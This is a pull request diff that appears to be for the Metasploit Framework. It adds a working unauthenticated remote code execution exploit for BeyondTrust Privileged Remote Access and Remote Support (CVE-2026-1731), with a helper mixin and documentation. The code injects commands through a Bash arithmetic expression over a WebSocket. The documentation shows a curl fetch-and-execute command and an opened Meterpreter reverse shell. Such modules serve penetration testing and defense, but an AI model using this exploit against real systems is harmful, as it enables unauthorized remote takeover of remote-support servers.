### PR TITLE
Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/R…

### DIFF
--- a/documentation/modules/exploit/linux/http/beyondtrust_pra_rs_command_injection.md
+++ b/documentation/modules/exploit/linux/http/beyondtrust_pra_rs_command_injection.md
@@ -13,7 +13,7 @@ context (`a[$(command)]0`).
 2. `use exploit/linux/http/beyondtrust_pra_rs_command_injection`
 3. `set RHOSTS <TARGET_IP_ADDRESS>`
 4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
-5. `set LHOST <YOUR_IP_ADDRESS>`
+5. `set LHOST <ATTACKER_IP_ADDRESS>`
 6. `set LPORT 4444`
 7. `check`
 8. `exploit`
@@ -31,7 +31,7 @@ By default, this is auto discovered by querying the target.
 ## Scenarios
 
 ```
-msf exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > run verbose=true 
+msf exploit(linux/http/beyondtrust_pra_rs_command_injection) > run verbose=true 
 [*] Command to run on remote host: curl -so /var/tmp/sjlnZMOtljNA http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x /var/tmp/sjlnZMOtljNA;/var/tmp/sjlnZMOtljNA&sleep 3;rm -rf /var/tmp/sjlnZMOtljNA
 [*] Fetch handler listening on 192.168.3.7:8080
 [*] HTTP server started

--- a/documentation/modules/exploit/linux/http/beyondtrust_pra_rs_command_injection.md
+++ b/documentation/modules/exploit/linux/http/beyondtrust_pra_rs_command_injection.md
@@ -1,0 +1,60 @@
+## Vulnerable Application
+This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
+Access (PRA) and Remote Support (RS) by leveraging CVE-2026-1731, an OS command injection vulnerability.
+The injected command is executed with the privileges of the site user of the targeted BeyondTrust product site.
+Affected version are versions `25.3.1` and prior for Remote Support (RS), versions `24.3.4` and prior for Privileged Remote Access (PRA).
+The vulnerability exists in the WebSocket-based support desk customer interface. The module establishes a
+WebSocket connection to the vulnerable endpoint and injects an OS command via a Bash arithmetic evaluation
+context (`a[$(command)]0`).
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/beyondtrust_pra_rs_command_injection`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+5. `set LHOST <YOUR_IP_ADDRESS>`
+6. `set LPORT 4444`
+7. `check`
+8. `exploit`
+
+## Options
+
+### TargetCompanyName (Advanced)
+If set, use this name value to identify the company name of the deployed site (e.g. `mytestcompany`).
+By default, this is auto discovered by querying the target.
+
+### TargetServerFQDN (Advanced)
+If set, use this FQDN value to identify the FQDN of the deployed site (e.g. `support.mytestcompany.com`).
+By default, this is auto discovered by querying the target.
+
+## Scenarios
+
+```
+msf exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > run verbose=true 
+[*] Command to run on remote host: curl -so /var/tmp/sjlnZMOtljNA http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x /var/tmp/sjlnZMOtljNA;/var/tmp/sjlnZMOtljNA&sleep 3;rm -rf /var/tmp/sjlnZMOtljNA
+[*] Fetch handler listening on 192.168.3.7:8080
+[*] HTTP server started
+[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w
+[*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected version 24.1.2
+[*] Got site info via the /get_mech_list?version=3 endpoint.
+[*] Company name: mytestcompany
+[*] Site FQDN: 
+[*] Using company name: mytestcompany
+[*] Client 10.5.132.179 requested /EO6WzfXF6CGyqdBiy1rT5w
+[*] Sending payload to 10.5.132.179 (curl/8.5.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 10.5.132.179
+[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.179:33578) at 2026-02-24 16:14:36 +0100
+
+meterpreter > sysinfo
+Computer     : bombur
+OS           : Gentoo 2.14 (Linux 6.1.76-bt)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+
+```

--- a/lib/msf/core/exploit/remote/http/beyondtrust.rb
+++ b/lib/msf/core/exploit/remote/http/beyondtrust.rb
@@ -1,0 +1,153 @@
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module Beyondtrust
+          include Msf::Exploit::Remote::HttpClient
+      
+          def initialize(info={})
+            super
+          end
+
+          def get_version
+            res = send_request_cgi(
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path, 'get_rdf'),
+              'vars_get' => {
+                'comp' => 'sdcust',
+                'locale_code' => 'en-us'
+              }
+            ) 
+            return nil unless res&.code == 200
+
+            header = res.body.match(/^(0 Successful\n.+\n\d+\n)/)
+            
+            return nil unless header
+            
+            brdf_data = res.body[header[1].length..]
+            
+            return nil unless brdf_data.include?('Thank you for using BeyondTrust')
+
+            magic, _, _, prod_version_tag1, file_version_data_len, file_version_tag2 = brdf_data.unpack('NCvCCC')
+
+            return nil unless magic == 0x42524446 # "BRDF" in ASCII
+            return nil unless prod_version_tag1 == 0x91
+            return nil unless file_version_tag2 == 0x81
+
+            brdf_data[10, file_version_data_len - 1]
+          end
+
+          # We need to know the target sites company name, or FQDN, in order to successfully establish a WebSocket connection.
+          # We first favor the user setting either the TargetCompanyName or TargetServerFQDN options. If not set we then try
+          # an undocumented API endpoint /get_mech_list, that should return the target site company name. Finally, we fall
+          # back on the /download_client_connector endpoint which will also report a servername and site FQDN.
+          def get_site_info
+            if !datastore['TargetCompanyName'].blank? || !datastore['TargetServerFQDN'].blank?
+              return {
+                company: datastore['TargetCompanyName'],
+                server: datastore['TargetServerFQDN']
+              }
+            end
+
+            site_info = get_site_info_via_mech_list
+
+            return site_info unless site_info.nil?
+
+            get_site_info_via_download_client_connector
+          end
+
+          # The internal undocumented API located at the /get_mech_list endpoint will return the company name
+          # of the target site. We try version=3 (JSON, newer instances) first, then fall back to version=2
+          # (semicolon-separated key=value pairs, for older instances such as 22.x where version=3 returns HTTP 500).
+          def get_site_info_via_mech_list
+            %w[3 2].each do |version|
+              opts = {
+                'method' => 'GET',
+                'uri' => normalize_uri(target_uri.path, 'get_mech_list'),
+                'vars_get' => { 'version' => version }
+              }
+              opts['headers'] = { 'Accept' => 'application/json' } if version == '3'
+
+              res = send_request_cgi(opts)
+              next unless res&.code == 200
+
+              company = version == '3' ? parse_mech_list_json(res) : parse_mech_list_text(res)
+              next if company.blank?
+
+              vprint_status("Got site info via the /get_mech_list?version=#{version} endpoint.")
+              return { company: company, server: nil }
+            end
+
+            error('get_site_info_via_mech_list company not found.')
+          end
+
+          def parse_mech_list_json(res)
+            res.get_json_document['company']
+          end
+
+          # Parses semicolon-separated key=value pairs (e.g. "company=sewtest;product=ingredi").
+          def parse_mech_list_text(res)
+            res.body.split(';').each do |part|
+              part.strip!
+              return part.sub('company=', '') if part.start_with?('company=')
+            end
+            nil
+          end
+
+          def get_site_info_via_download_client_connector
+            res1 = send_request_cgi(
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path, 'download_client_connector'),
+              'vars_get' => {
+                'issue_menu' => '1'
+              }
+            )
+
+            return module_error('get_site_info Connection 1 failed.') unless res1
+
+            return module_error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
+
+            return module_error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
+
+            res2 = send_request_cgi(
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
+            )
+
+            return module_error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
+
+            return module_error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
+
+            return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
+
+            company = Rex::Text.html_decode(::Regexp.last_match(1))
+
+            return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
+
+            servers = Rex::Text.html_decode(::Regexp.last_match(1))
+
+            servers_array = JSON.parse(servers)
+
+            return module_error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
+
+            return module_error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
+
+            server = servers_array.first
+
+            vprint_status('Got site info via the /download_client_connector endpoint.')
+
+            { company: company, server: server }
+          rescue JSON::ParserError
+            module_error('get_site_info_via_download_client_connector JSON parse error.')
+          end
+
+          # Helper method to print an error and then return nil.
+          def module_error(message)
+            print_error(message)
+            nil
+          end
+        end
+      end
+    end
+  end
+end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_command_injection.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_command_injection.rb
@@ -1,0 +1,299 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http::WebSocket
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
+          Access (PRA) and Remote Support (RS). It leverages three different vulnerabilities depending on the
+          user-selected target.
+
+          The default target leverages CVE-2026-1731, a direct command injection affecting RS versions 25.3.1
+          and prior, and PRA versions 24.3.4 and prior.
+
+          Alternatively, the module can leverage a chain of CVE-2025-1094 (SQL injection in PostgreSQL)
+          and CVE-2024-12356 (argument injection), affecting RS and PRA versions 24.3.1 and prior.
+
+          Exploitation occurs with the privileges of the site user of the targeted BeyondTrust product site.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # Rapid7 Analysis and Metasploit module (CVE-2024-12356 / CVE-2025-1094)
+          'Harsh Jaiswal', # Discovery of CVE-2026-1731
+          'Jonah Burgess (CryptoCat)' # Added support for CVE-2026-1731
+        ],
+        'References' => [
+          ['CVE', '2026-1731'], # Direct OS command injection in BeyondTrust
+          ['CVE', '2025-1094'], # SQL injection in PostgreSQL code
+          ['CVE', '2024-12356'], # Argument injection in BeyondTrust (may be combined with CVE-2025-1094)
+          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt26-02'], # Vendor advisory for CVE-2026-1731
+          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # Vendor advisory for CVE-2024-12356
+          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advisory for CVE-2025-1094
+          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis (CVE-2024-12356 / CVE-2025-1094)
+          ['URL', 'https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis'] # Rapid7 Analysis (CVE-2026-1731)
+        ],
+        'DisclosureDate' => '2026-02-06',
+        'Platform' => [ 'linux', 'unix' ],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false, # Executes as the site user.
+        'Targets' => [
+          [
+            'CVE-2026-1731 (Command Injection)', {
+              'Payload' => {
+                'DisableNops' => true,
+                # We are injecting into a Bash arithmetic evaluation: a[$(command)]0.
+                # We must avoid characters that break the subshell or the arithmetic structure.
+                'BadChars' => '[$()]'
+              }
+            }
+          ],
+          [
+            'CVE-2025-1094 (SQL Injection)', {
+              'Payload' => {
+                'DisableNops' => true,
+                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
+                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
+                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
+                'BadChars' => '\'"\\'
+              }
+            }
+          ],
+          [
+            'CVE-2025-1094 (SQLi) with CVE-2024-12356 (Argument Injection)', {
+              'Payload' => {
+                'DisableNops' => true,
+                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
+                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
+                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
+                'BadChars' => '\'"\\'
+              }
+            }
+          ]
+        ],
+        # NOTE: Tested with the following payloads:
+        #   cmd/linux/http/x64/meterpreter/reverse_tcp
+        #   cmd/unix/reverse_bash
+        #   cmd/unix/generic
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          # A writable directory on the target for fetch based payloads to write to.
+          'FETCH_WRITABLE_DIR' => '/var/tmp',
+          # Delete the fetch binary after execution.
+          'FETCH_DELETE' => true,
+          # By default, a deployed site, like Remote Support, is expected to be located at the root path.
+          'URIPATH' => '/'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('TargetCompanyName', [false, 'If set, use this name value to identify the company name of the deployed site. By default, this is auto discovered.']),
+        OptString.new('TargetServerFQDN', [false, 'If set, use this FQDN value to identify the FQDN of the deployed site. By default, this is auto discovered.'])
+      ]
+    )
+  end
+
+  def check
+    CheckCode::Vulnerable('Yaay!')
+  end
+
+  def exploit
+    # For the deployed site being targeted (either Privileged Remote Access or Remote Support), we need to know either
+    # the company name the site is registered to, or the FQDN of the deployed site. This is required to successfully
+    # establish a WebSocket connection to the target site application. By default, we query the target site to
+    # discover this, however a user can manually set either the expected company name or FQDN as a module option.
+    site_info = get_site_info
+
+    if site_info.nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to get the site info.')
+    end
+
+    vprint_status("Company name: #{site_info[:company]}")
+    vprint_status("Site FQDN: #{site_info[:server]}")
+
+    headers = {
+      # This is the vulnerable application which is reachable over a WebSocket to the target site.
+      'Sec-WebSocket-Protocol' => 'ingredi support desk customer thin'
+    }
+
+    if !site_info[:company].blank?
+      print_status("Using company name: #{site_info[:company]}")
+
+      headers['X-Ns-Company'] = site_info[:company]
+    elsif !site_info[:server].blank?
+      print_status("Using site FQDN: #{site_info[:server]}")
+
+      headers['Host'] = site_info[:server]
+    else
+      fail_with(Failure::BadConfig, 'No company name or site FQDN set. Either set the TargetCompanyName or TargetServerFQDN option to a valid value, or clear them both to auto discover these values at run time.')
+    end
+
+    wsock = connect_ws(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nw'),
+      'headers' => headers
+    )
+
+    prefix = Rex::Text.rand_text_alpha(rand(1..5))
+    suffix = rand(0..5)
+
+    wsock.put_wstext("#{prefix}[$(#{payload.encoded})]#{suffix}\n")
+
+    # Complete the sequence with randomized dummy data to avoid static artifacts
+    wsock.put_wstext("#{SecureRandom.uuid}\n")     # remoteCookie
+    wsock.put_wstext("#{rand(0..2)}\n")            # remoteAuthType (usually 0, 1, or 2)
+    wsock.put_wstext("#{Rex::Text.rand_text_alpha(rand(4..8))}\n") # remoteGsKey
+
+    while wsock.has_read_data? datastore['WFSDELAY']
+      frame = wsock.get_wsframe
+
+      break if frame.nil?
+
+      if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
+        print_warning('WebSocket closed unexpectedly! This may indicate that a patch has been applied, and the target is no longer vulnerable.')
+        break
+      end
+    end
+
+    wsock.wsclose
+  rescue Rex::Proto::Http::WebSocket::ConnectionError => e
+    if e.http_response && !e.http_response.body.blank?
+      if e.http_response.body == 'Invalid company or app name'
+        print_error("#{e.http_response.body} - Set either the TargetCompanyName or TargetServerFQDN option to a valid value.")
+      else
+        print_error(e.http_response.body)
+      end
+    end
+    raise
+  end
+
+  # We need to know the target sites company name, or FQDN, in order to successfully establish a WebSocket connection.
+  # We first favor the user setting either the TargetCompanyName or TargetServerFQDN options. If not set we then try
+  # an undocumented API endpoint /get_mech_list, that should return the target site company name. Finally, we fall
+  # back on the /download_client_connector endpoint which will also report a servername and site FQDN.
+  def get_site_info
+    if !datastore['TargetCompanyName'].blank? || !datastore['TargetServerFQDN'].blank?
+      return {
+        company: datastore['TargetCompanyName'],
+        server: datastore['TargetServerFQDN']
+      }
+    end
+
+    site_info = get_site_info_via_mech_list
+
+    return site_info unless site_info.nil?
+
+    get_site_info_via_download_client_connector
+  end
+
+  # The internal undocumented API located at the /get_mech_list endpoint will return the company name
+  # of the target site. We try version=3 (JSON, newer instances) first, then fall back to version=2
+  # (semicolon-separated key=value pairs, for older instances such as 22.x where version=3 returns HTTP 500).
+  def get_site_info_via_mech_list
+    %w[3 2].each do |version|
+      opts = {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'get_mech_list'),
+        'vars_get' => { 'version' => version }
+      }
+      opts['headers'] = { 'Accept' => 'application/json' } if version == '3'
+
+      res = send_request_cgi(opts)
+      next unless res&.code == 200
+
+      company = version == '3' ? parse_mech_list_json(res) : parse_mech_list_text(res)
+      next if company.blank?
+
+      vprint_status("Got site info via the /get_mech_list?version=#{version} endpoint.")
+      return { company: company, server: nil }
+    end
+
+    error('get_site_info_via_mech_list company not found.')
+  end
+
+  def parse_mech_list_json(res)
+    res.get_json_document['company']
+  end
+
+  # Parses semicolon-separated key=value pairs (e.g. "company=sewtest;product=ingredi").
+  def parse_mech_list_text(res)
+    res.body.split(';').each do |part|
+      part.strip!
+      return part.sub('company=', '') if part.start_with?('company=')
+    end
+    nil
+  end
+
+  def get_site_info_via_download_client_connector
+    res1 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'download_client_connector'),
+      'vars_get' => {
+        'issue_menu' => '1'
+      }
+    )
+
+    return module_error('get_site_info Connection 1 failed.') unless res1
+
+    return module_error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
+
+    return module_error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
+
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
+    )
+
+    return module_error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
+
+    return module_error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
+
+    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
+
+    company = Rex::Text.html_decode(::Regexp.last_match(1))
+
+    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
+
+    servers = Rex::Text.html_decode(::Regexp.last_match(1))
+
+    servers_array = JSON.parse(servers)
+
+    return module_error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
+
+    return module_error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
+
+    server = servers_array.first
+
+    vprint_status('Got site info via the /download_client_connector endpoint.')
+
+    { company: company, server: server }
+  rescue JSON::ParserError
+    module_error('get_site_info_via_download_client_connector JSON parse error.')
+  end
+
+  # Helper method to print an error and then return nil.
+  def module_error(message)
+    print_error(message)
+    nil
+  end
+end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_command_injection.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_command_injection.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::Remote::HTTP::Beyondtrust
   include Msf::Exploit::Remote::HttpClient
   include Rex::Proto::Http::WebSocket
   prepend Msf::Exploit::Remote::AutoCheck
@@ -30,18 +31,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'sfewer-r7', # Rapid7 Analysis and Metasploit module (CVE-2024-12356 / CVE-2025-1094)
-          'Harsh Jaiswal', # Discovery of CVE-2026-1731
-          'Jonah Burgess (CryptoCat)' # Added support for CVE-2026-1731
+          'Harsh Jaiswal', # Discovery
+          'Jonah Burgess (CryptoCat)' # Module
         ],
         'References' => [
           ['CVE', '2026-1731'], # Direct OS command injection in BeyondTrust
-          ['CVE', '2025-1094'], # SQL injection in PostgreSQL code
-          ['CVE', '2024-12356'], # Argument injection in BeyondTrust (may be combined with CVE-2025-1094)
           ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt26-02'], # Vendor advisory for CVE-2026-1731
-          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # Vendor advisory for CVE-2024-12356
-          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advisory for CVE-2025-1094
-          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis (CVE-2024-12356 / CVE-2025-1094)
           ['URL', 'https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis'] # Rapid7 Analysis (CVE-2026-1731)
         ],
         'DisclosureDate' => '2026-02-06',
@@ -50,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false, # Executes as the site user.
         'Targets' => [
           [
-            'CVE-2026-1731 (Command Injection)', {
+            'Command Injection', {
               'Payload' => {
                 'DisableNops' => true,
                 # We are injecting into a Bash arithmetic evaluation: a[$(command)]0.
@@ -59,33 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
               }
             }
           ],
-          [
-            'CVE-2025-1094 (SQL Injection)', {
-              'Payload' => {
-                'DisableNops' => true,
-                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
-                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
-                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
-                'BadChars' => '\'"\\'
-              }
-            }
-          ],
-          [
-            'CVE-2025-1094 (SQLi) with CVE-2024-12356 (Argument Injection)', {
-              'Payload' => {
-                'DisableNops' => true,
-                # Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
-                # getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
-                # We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
-                'BadChars' => '\'"\\'
-              }
-            }
-          ]
         ],
-        # NOTE: Tested with the following payloads:
-        #   cmd/linux/http/x64/meterpreter/reverse_tcp
-        #   cmd/unix/reverse_bash
-        #   cmd/unix/generic
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true,
@@ -114,7 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    CheckCode::Vulnerable('Yaay!')
+    version = get_version
+    return CheckCode::Unknown('Failed to determine BeyondTrust version') if version.nil?
+
+    version = Rex::Version.new(version)
+    return CheckCode::Appears("Detected vulnerable version of BeyondTrust #{version}") if version <= Rex::Version.new('25.3.1')
+
+    CheckCode::Safe("BeyondTrust version #{version} is not vulnerable")
   end
 
   def exploit
@@ -174,7 +149,6 @@ class MetasploitModule < Msf::Exploit::Remote
         break
       end
     end
-
     wsock.wsclose
   rescue Rex::Proto::Http::WebSocket::ConnectionError => e
     if e.http_response && !e.http_response.body.blank?
@@ -184,116 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error(e.http_response.body)
       end
     end
-    raise
+    fail_with(Failure::PayloadFailed, "WebSocket connection failed: #{e.message}")
   end
 
-  # We need to know the target sites company name, or FQDN, in order to successfully establish a WebSocket connection.
-  # We first favor the user setting either the TargetCompanyName or TargetServerFQDN options. If not set we then try
-  # an undocumented API endpoint /get_mech_list, that should return the target site company name. Finally, we fall
-  # back on the /download_client_connector endpoint which will also report a servername and site FQDN.
-  def get_site_info
-    if !datastore['TargetCompanyName'].blank? || !datastore['TargetServerFQDN'].blank?
-      return {
-        company: datastore['TargetCompanyName'],
-        server: datastore['TargetServerFQDN']
-      }
-    end
-
-    site_info = get_site_info_via_mech_list
-
-    return site_info unless site_info.nil?
-
-    get_site_info_via_download_client_connector
-  end
-
-  # The internal undocumented API located at the /get_mech_list endpoint will return the company name
-  # of the target site. We try version=3 (JSON, newer instances) first, then fall back to version=2
-  # (semicolon-separated key=value pairs, for older instances such as 22.x where version=3 returns HTTP 500).
-  def get_site_info_via_mech_list
-    %w[3 2].each do |version|
-      opts = {
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'get_mech_list'),
-        'vars_get' => { 'version' => version }
-      }
-      opts['headers'] = { 'Accept' => 'application/json' } if version == '3'
-
-      res = send_request_cgi(opts)
-      next unless res&.code == 200
-
-      company = version == '3' ? parse_mech_list_json(res) : parse_mech_list_text(res)
-      next if company.blank?
-
-      vprint_status("Got site info via the /get_mech_list?version=#{version} endpoint.")
-      return { company: company, server: nil }
-    end
-
-    error('get_site_info_via_mech_list company not found.')
-  end
-
-  def parse_mech_list_json(res)
-    res.get_json_document['company']
-  end
-
-  # Parses semicolon-separated key=value pairs (e.g. "company=sewtest;product=ingredi").
-  def parse_mech_list_text(res)
-    res.body.split(';').each do |part|
-      part.strip!
-      return part.sub('company=', '') if part.start_with?('company=')
-    end
-    nil
-  end
-
-  def get_site_info_via_download_client_connector
-    res1 = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'download_client_connector'),
-      'vars_get' => {
-        'issue_menu' => '1'
-      }
-    )
-
-    return module_error('get_site_info Connection 1 failed.') unless res1
-
-    return module_error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
-
-    return module_error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
-
-    res2 = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
-    )
-
-    return module_error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
-
-    return module_error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
-
-    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
-
-    company = Rex::Text.html_decode(::Regexp.last_match(1))
-
-    return module_error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
-
-    servers = Rex::Text.html_decode(::Regexp.last_match(1))
-
-    servers_array = JSON.parse(servers)
-
-    return module_error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
-
-    return module_error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
-
-    server = servers_array.first
-
-    vprint_status('Got site info via the /download_client_connector endpoint.')
-
-    { company: company, server: server }
-  rescue JSON::ParserError
-    module_error('get_site_info_via_download_client_connector JSON parse error.')
-  end
-
-  # Helper method to print an error and then return nil.
-  def module_error(message)
-    print_error(message)
-    nil
-  end
 end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::Remote::HTTP::Beyondtrust
   include Msf::Exploit::Remote::HttpClient
   include Rex::Proto::Http::WebSocket
   prepend Msf::Exploit::Remote::AutoCheck
@@ -17,61 +18,27 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution',
         'Description' => %q{
           This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
-          Access (PRA) and Remote Support (RS). It leverages three different vulnerabilities depending on the
-          user-selected target.
-
-          The default target leverages CVE-2026-1731, a direct command injection affecting RS versions 25.3.1
-          and prior, and PRA versions 24.3.4 and prior.
-
-          Alternatively, the module can leverage a chain of CVE-2025-1094 (SQL injection in PostgreSQL)
-          and CVE-2024-12356 (argument injection), affecting RS and PRA versions 24.3.1 and prior.
-
-          Exploitation occurs with the privileges of the site user of the targeted BeyondTrust product site.
+          Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
+          product site. This exploit targets PRA and RS versions 24.3.1 and below.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'sfewer-r7', # Rapid7 Analysis and Metasploit module (CVE-2024-12356 / CVE-2025-1094)
-          'Harsh Jaiswal', # Discovery of CVE-2026-1731
-          'Jonah Burgess (CryptoCat)' # Added support for CVE-2026-1731
+          'sfewer-r7' # Rapid7 Analysis and Metasploit module
         ],
         'References' => [
-          ['CVE', '2026-1731'], # Direct OS command injection in BeyondTrust
-          ['CVE', '2025-1094'], # SQL injection in PostgreSQL code
-          ['CVE', '2024-12356'], # Argument injection in BeyondTrust (may be combined with CVE-2025-1094)
-          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt26-02'], # Vendor advisory for CVE-2026-1731
-          ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # Vendor advisory for CVE-2024-12356
-          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advisory for CVE-2025-1094
-          ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis (CVE-2024-12356 / CVE-2025-1094)
-          ['URL', 'https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis'] # Rapid7 Analysis (CVE-2026-1731)
